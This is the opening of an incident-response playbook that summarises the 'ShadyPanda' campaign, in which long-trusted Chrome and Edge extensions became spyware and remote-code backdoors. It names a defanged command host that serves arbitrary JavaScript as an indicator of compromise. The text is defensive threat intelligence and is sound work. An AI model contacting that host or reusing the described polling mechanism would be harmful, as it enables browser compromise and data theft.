IR playbook: hunting and evicting the “Sleeper” Chrome/Edge extensions (ShadyPanda, ~4.3M installs)
Koi and Malwarebytes disclosed a long-running extension operation (“ShadyPanda”) where multiple Chrome/Edge add-ons accumulated trust for years and then flipped to spyware/RCE via hourly command tasks. The operators reached ~4.3M installs across phases; one cluster polls api.extensionplay[.]com hourly to fetch and execute arbitrary JavaScript, and another (e.g., WeTab) streams browsing data in real time. Google removed affected Chrome Web Store items; at disclosure time some Microsoft Edge Add-ons remained available. Treat this as a browser-level backdoor that bypasses traditional endpoint controls and exposes SaaS sessions and cookies. (Koi, Malwarebytes, BleepingComputer, SecurityWeek, The Register).